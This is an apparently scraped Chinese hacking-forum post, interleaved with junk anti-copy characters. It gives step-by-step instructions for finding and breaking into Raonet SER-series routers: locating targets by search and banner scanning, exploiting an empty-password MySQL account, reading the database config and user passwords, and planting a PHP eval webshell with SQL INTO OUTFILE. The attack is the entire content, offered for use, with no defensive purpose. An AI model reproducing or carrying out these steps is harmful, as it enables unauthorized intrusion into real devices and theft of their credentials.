寻找存在漏洞的路由器方法:) t# g( A. O% X% O
* X; k, K/ f3 y& W, Q Q
1:google搜索'Raonet Subscriber Ethernet Router'
9 H7 X* S, F" ~; x( l' X
$ I0 W& }' U p2 z' W2 M% d' Q2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20017 z8 _8 C+ n8 Z
' G; e7 d' M5 r h, Q' a6 M3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
- f: C3 T; T' _# V) {1 c: r3 \& \0 }
* X+ F+ D8 D6 V1 x5 m$ q" C' Y* L//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
" _+ [5 S' o3 A% B" n2 {
" |% ?5 ^% [7 d8 K1 _/ C 8 @3 m) q5 @" X
6 S' s3 e# q8 q, |4 t- q
入侵步骤:
" F6 X4 ?) B/ I* k0 t) m3 F3 k# ?; w7 t6 @0 A( l$ o$ B3 J3 b$ ], `
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php- `7 M5 t0 s( ?: D
# L9 Q0 t& C: m! ?. I2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
! J% c# i1 p8 g/ F* h" J3:得到密码后连接,查看GUI管理密码:
1 ^( Y, W- j7 S S4 S/ S: y! D9 t: Quse ser_500- S) |4 ^# _, A1 l) W
select id,passwd from user;+ J7 G" B' Q* ?! ]
4:通过数据库写入webshell,执行命令:
. K* E( H4 K! n; o+ I2 R1 Duse mysql;# O% B8 l0 V; ^
create table ok(cmd TEXT);
" `; n$ [* T9 A& `! tinsert into ok values("<?php @eval($_POST[cmd])?>");) }- G8 a/ D0 n: b, b
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
8 l2 f' G+ E( P$ I: f" E0 Q0 fdrop table ok;
! q1 @. P/ G7 I* p5 W# F, \6 B+ i- k/ b* G
5:连接后门shell.php
) W6 b) D) M: L3 ?# ]$ [4 z4 B$ A# [: b2 |. C: U& m
6. 搞定!
% `2 j8 i4 c$ h! A$ M7 f. R
9 G) H/ }. b' _3 p! X+ k |